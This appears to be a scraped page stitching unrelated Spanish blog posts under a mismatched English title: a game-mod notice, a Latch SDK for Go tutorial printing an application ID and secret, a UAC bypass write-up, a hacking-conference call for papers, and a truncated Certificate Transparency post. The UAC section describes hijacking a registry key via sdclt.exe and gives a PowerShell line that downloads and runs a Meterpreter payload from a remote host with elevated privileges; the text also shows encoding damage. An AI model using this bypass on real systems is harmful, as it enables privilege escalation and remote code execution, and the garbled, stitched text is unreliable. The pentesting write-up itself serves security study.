Tester Jobs Requirements (VIDEO GAME)

Goten con el atuendo de Goku hace su debut en Dragon Ball Z Budokai Tenkaichi 3. Trabajo realizado por ApioMan

DISPONIBLE SIN HQ como traje alternativo de Goten

Saludos
ApioMan

Tanto mi gran amigo Rafael Troncoso (@tuxotron) como yo, somos dos usuarios de Latch y llev�bamos mucho tiempo queriendo implementarlo a nivel de desarrollador en alg�n proyecto propio. Aunque hemos hecho algunas pruebas para integrarlo en Raspberry Pi y otros proyectos relacionados con el IoT, finalmente nos hemos decidido por un SDK en uno de los lenguajes que mayor popularidad est� ganando en los �ltimos meses. Hablamos del lenguaje Go, desarrollado por Google. Antes de nada, indicar que esta versi�n de SDK Latch para Go no es oficial de ElevenPaths.

Figura 1: Friends, tenemos un nuevo SDK de Latch para Go!

Rafael ha creado una primera versi�n de este SDK y hemos estado realizando varias pruebas sobre �l para comprobar que las funciones b�sicas funcionan correctamente. Pero antes de entrar en materia queremos explicar por qu� nos hemos decidido por el lenguaje Go. Primero porque si el legendario Ken Thompson, uno de los padres del Lenguaje C, es uno de los desarrolladores y por lo tanto hay que prestarle mucha atenci�n. De hecho, otra de sus ventajas es su sintaxis, la cual es bastante parecida al Lenguaje C por lo que no ser� dif�cil acercarte a Go si tienes conocimientos de este lenguaje. Adem�s, ha heredado la mayor�a de las caracter�sticas (y mejorando otras) que han hecho del Lenguaje C una referencia en el sector.

Figura 2: SDK de Latch para Go (no oficial)

Antes de comenzar, suponemos que tienes ya una cuenta de Latch como desarrollador. Tambi�n ser� necesario que tengas instalado Go para el sistema operativo que est�s utilizando Windows, Linux o macOS. El �ltimo paso es tener instalado Latch para tu Smartphone. Esto puedes hacerlo directamente desde la tienda de la plataforma que utilices o desde este enlace.

Utilizar el SDK de Latch para Go

Nosotros haremos las pruebas desde un ordenador con Linux. Utiliza el siguiente comando para instalar el SDK Latch para Go:

# go get github.com/tuxotron//latch-sdk-go

Finalmente estar� instalado en la siguiente ruta:

$GOPATH/src/github.com/tuxotron/latch-sdk-go/

Es fundamental obtener los valores Application ID y Secret, desde la consola de administraci�n web de Latch, en el men� Manage Applications. Sobre la aplicaci�n que queramos proteger pulsamos la opci�n Edit, tal y como se muestra a continuaci�n:

Figura 3: Men� de Latch donde podemos ver el ApplicationID y el Secret

En nuestro ejemplo, obtenemos los siguientes valores:

� Application ID: 7p9hrnmiWLf8EpbNcPFNfkaCrzPjW3kzTt2rrW9c
� Secret: YkmAJAX2W4v4JU9jP3Ce

Ahora procederemos a hacer algunas de las llamadas b�sicas de Latch utilizando el SDK de Latch para Go. Utilizaremos un fichero que hemos llamado main.go que puedes ver a continuaci�n:

Figura 4: Fichero main.go en el SDK de Latch para Go

El c�digo de este programa crear� una instancia en Latch de nuestro servicio. A�adiremos en Latch desde la aplicaci�n del Smartphone, un nuevo servicio para poder asociar nuestra aplicaci�n. Luego lo pareamos con la opci�n Pair with Latch:

Figura 5: Opci�n de Latch donde podemos activa "Pair with Latch"

Esta opci�n nos devolver� un token temporal de pareado de 6 d�gitos.

Figura 6: Token Temporal de Pareado devuelto por Latch

Ahora tendremos que a�adir la llamada para realizar el pareo en nuestro c�digo anterior. El c�digo a�adido son las l�neas 3,12,13,14,15,16,17,18 y 19 en el fichero main.go.

Figura 7: Configuraci�n de pareado con Latch

La l�nea 12 realiza una llamada a la funci�n pair con el token recibido en la aplicaci�n m�vil. El resto del c�digo se encarga de imprimir por pantalla el resultado de la llamada. Finalmente, cuando ejecutemos go run main.go devolver� el accountId, que ser� parecido al que mostramos a continuaci�n:

OK {"accountId":"zZhqg7H9pabaZDDJg4y2HcFWCjZtDm6yXBg7QDdrKNjBJfreirxzjY74R2dtxbta"}

Este valor de accountId es necesario para comprobar el estado de nuestra aplicaci�n desde Latch. Una vez realizado el pareo no necesitaremos m�s la opci�n PairWithToken(...) as� que la comentamos en el c�digo (l�nea 12) y a�adimos una nueva l�nea para comprobar el estado de Latch status(...) que puedes ver en la l�nea 13:

Figura 8: Accediendo al estado de un accountID en Latch

La llamada status recibe tres par�metros, accountId, el cual recibimos cuando hicimos el pareado y los otros dos son valores booleanos (ver documentaci�n Latch). Si ejecutamos nuestro c�digo ahora y no tenemos nuestra aplicaci�n bloqueada con Latch tendr�amos que ver una salida parecida a la siguiente:

OK{"operations":{"WcqfYQErkANrk7wfijgv":{"status":"on"}}}

Recibimos el ID de la operaci�n y el estado de Latch, que en este caso est� activada, es decir, no bloqueada.

Figura 9: Activaci�n de Latch sobre nuestro servicio

Cuando bloqueamos nuestra aplicaci�n desde Latch, obtendremos una salida similar a la siguiente:

OK{"operations":{"WcqfYQErkANrk7wfijgv":{"status":"off"}}}

La aplicaci�n est� bloqueada por Latch y como hemos incluido el par�metro silent con el valor falso, recibiremos una alerta en nuestro smartphone como esta:

Figura 10: Aviso de alerta de acceso a Latch

A modo de resumen, estos son los pasos que tenemos que realizar para poder proteger un servicio Latch:

1. Obtener Applicaction ID y Secret 

2. PairWithToken con el token obtenido en la aplicaci�n m�vil. 

3. Llamar a la funci�n status con el accountId, y comprobamos si el estado (status) est� a ON (permitido) , si el estado est� a OFF evitamos la ejecuci�n de la operaci�n y notificamos al usuario con el alg�n tipo de error.

Finalmente, para quitar el pareo de la aplicaci�n podemos usar la funci�n Unpair, y le pasamos como par�metro el accountId:

Figura 11: Opci�n de Unpair en linea 12

Recibiremos una alerta en el m�vil indicando que todo ha ido bien:

Figura 12: Alerta recibida una vez hemos hecho el Unpair del servicio

Esperamos que os haya gustado esta primera introducci�n al SDK Latch en Go. Seguro que haremos m�s pruebas e implementaremos m�s funciones que compartiremos con todos vosotros.

Autores: Fran Ram�rez (@cyberhadesblog�), Investigador de ElevenPaths y escritor del libro �Microhistorias: an�cdotas y curiosidades de la Inform�tica� y  Rafael Troncoso (@tuxotron),  co-fundador del blog CyberHades y escritor del libro �Microhistorias: an�cdotas y curiosidades de la Inform�tica�

Hace unos meses Enigma0x3 publicaba un Bypass UAC distinto a los conocidos hasta el momento, se trataba de un bypass UAC Fileless, es decir, sin necesidad de subir una DLL o un binario al equipo para explotar o aprovecharse de la debilidad. En este caso, se manipulaban unos hives del registro y se lograba obtener ejecuci�n de c�digo en un contexto de integridad alto. Incluso, en su d�a, nos adelantamos siendo los primeros en migrar a Metasploit el c�digo del bypass UAC Fileless de Enigma0x3.

Figura 1: Fileless II. Un nuevo (s�, uno m�s otra vez) Bypass UAC para Windows

La batalla sigue su curso y siguen apareciendo bypasses de UAC, tal y como podemos ver casi semanalmente en UACMe. Incluso, nosotros tenemos nuestra versi�n del bypass de UAC con el DLL Hijacking con Wusa y aprovech�ndonos de CompMgmtLauncher.exe. Lo importante es ver c�mo muchas t�cnicas se repiten o el proceso para realizar b�squedas de debilidades en esta feature de Microsoft es muy parecida en muchos casos y entender las bases de todo esto.


Figura 2: V�deo con PoC de UAC Bypass usando CompMgmtLauncher en Windows 7/8/8.1
Hace un par de semanas os contaba c�mo hacer un bypass de UAC aprovech�ndonos de los AppPaths. Este bypass tambi�n fue descubierto por Enigma0x3. Hoy hablaremos de nuevo de este bypass y como conseguir que, gracias a ello, podamos obtener una nueva versi�n de bypass UAC Fileless.

Manos a la obra: En busca del Bypass UAC

Ya vimos que los binarios firmados por Microsoft que son auto-elevados pueden traer debilidades debido a la pol�tica de UAC, por ello se recomienda cambiarla a �Notificar siempre�. En el bypass de los AppPaths, el binario encontrado que proporcionaba el �xito era el binario sdclt.exe.

Figura 3: Configuraci�n segura en Modo Windows "Vista"

Cuando se analiz� los argumentos con los que se ejecuta sdclt.exe se pudo observar que existen varios y que alguno podr�a ser interesante. Enigma0x3 se dio cuenta de que cuando se invoca sdclt.exe se comprueba si el argumento coincide con �/kickoffelev�, si esto es as� se establece la ruta completa para sdclt.exe y se agrega �/kickoffjob� como par�metro y se invoca a SxShellExecuteWithElevate. Esto hace que se inicie �%systemroot%System32sdclt.exe /kickoffjob� con el verbo �runas�. En otras palabras, es una forma pragm�tica de ejecutar la opci�n �RunAsAdministrator� cuando se hace clic con el bot�n secundario.

Figura 4: invocaci�n de ejecuci�n

Si echamos un ojo a la ejecuci�n de sdclt.exe /Kickoffelev con nuestro procmon podremos observar que en la rama HKCU del registro de Windows nos encontramos �Shell[verbo]command� d�nde se podr� escribir cualquier cosa. En el caso del [verbo], ser� �runas� lo que nos encontraremos. En esta clave que no se encuentra podremos poner una llamada a un binario con par�metros, lo cual es muy interesante para lograr el bypass de UAC y ejecutar nuestro c�digo.

Figura 5: Clave NOT FOUND

Cuando se a�ade la clave por defecto en la ruta del registro HKCU SoftwateClassesexefileshell unascommand no se obtiene nada. Volviendo a ejecutar Procmon con esa ruta creada vemos que nos aparece una nueva clave no encontrada denominada IsolatedCommand. Ahora s�, en el momento que creemos esa clave y le demos un valor podremos ejecutar c�digo en un contexto de integridad alta.

Figura 6: Clave del Registro con direcci�n de shell

Si lanzamos el binario sdclt.exe /kickoffevel aparecer� una cmd.exe, tal y como se puede ver en la siguiente imagen. Se puede ver como se crea un fichero en c: y luego se borra, por lo que se est� ejecutando el cmd.exe en un proceso de integridad alta o con privilegio.

Figura 7: Shell ejecutada

Si modificamos el valor de la entrada por la ejecuci�n de una Powershell que ejecute la instrucci�n:

IEX (new-object net.webclient).downloadstring(�[ruta http de Meterpreter]�)

...podr�amos encontrar la posibilidad de ejecutar nuestro c�digo de forma remota en un contexto de integridad alto y sin necesidad de subir un binario o una DLL.

Figura 8: Ruta de ejecuci�n PowerShell

Y como lo mejor es verlo funcionando, en este v�deo de menos de dos minutos y medio, os dejo una demostraci�n paso a paso de lo que os he explicado en el art�culo.


Como se puede ver, es una nueva forma, muy similar, de realizar Fileless en un bypass de UAC. Microsoft poco a poco va parcheando este tipo de situaciones, aunque no lo consideren vulnerabilidades, y t�, por si acaso, deber�as subir el nivel de seguridad de UAC. En resumen, una nueva forma para utilizar en una auditor�a interna de sistemas.

Autor: Pablo Gonz�lez P�rez (@pablogonzalezpe)
Escritor de los libros "Metasploit para Pentesters", "Ethical Hacking", "Got Root" y �Pentesting con Powershell�, Microsoft MVP en Seguridad y Security Researcher en ElevenPaths

La Asociaci�n FAQin se enorgullece de anunciar la convocatoria de [papers / presentaciones / propuestas] en un nuevo congreso de FAQin - Todav�a vivo, perras!

Acerca del Congreso FAQin

El congreso de FAQin es un evento de hacking underground por invitaci�n realizado en Madrid, Espa�a, los d�as 3 y 4 de marzo. No hay prensa, no hay polis ... S�lo t�, un mont�n de compa�eros hackers y mucha cerveza gratis. Pi�nsalo.

Los asistentes deben pasar un reto parecido a un CTF para obtener una entrada. Los detalles completos estar�n disponibles en www.faqin.org

- =] Estamos buscando todo tipo de contenido haxorz, la seguridad ofensiva es nuestro tema favorito:

 - Ingenier�a inversa [Hardware, Software, Protocolos ...]
 - Escribir y usar exploits
 - Bypassing de protecciones
 - Ataques a la criptograf�a

- =] Pero tambi�n noshagamos-que-la-faqin-sea encantan las charlas sobre:

 - Seguridad de las comunicaciones y estado de la t�cnica
 - Hacking de hardware y dispositivos embebidos
 - Proyectos de electr�nica innovadores
 - Cualquier cosa que pienses que interesen a un pu�ado de nerds de inform�tica / expertos de la seguridad / haxorzs.

- =] Directrices:

 - Slots de 45 minutos, si necesita el doble h�znoslo saber.
 - �Nos encantan las demos, hacks en directo y PoCs!
 - Estamos abiertos a propuestas para cualquier tipo de taller o actividad interesante ...

Por favor env�anos un t�tulo, resumen detallado, biograf�a y ficha policial a cfp@faqin.org antes del 15 de febrero.

�Preguntas? �Entradas gratuitas? Info@faqin.org

Hace poco que hemos lanzado desde ElevenPaths nuestro add-on Certificate Transparency Checker para Mozilla Firefox, y es que no quedan muchos meses para que el modelo de Certificate Transparency empujado por Google empiece a ser realidad en Google Chrome. De hecho, a comienzos de este a�o Google ha empujado tambi�n un nuevo HTTP Header para que los servidores vayan reportando a los navegadores si van a estar listos o no para la llevada de Certificate Transparency.

Figura 1: Expect-CT un nuevo HTTP Header de Google para Certificate Transparency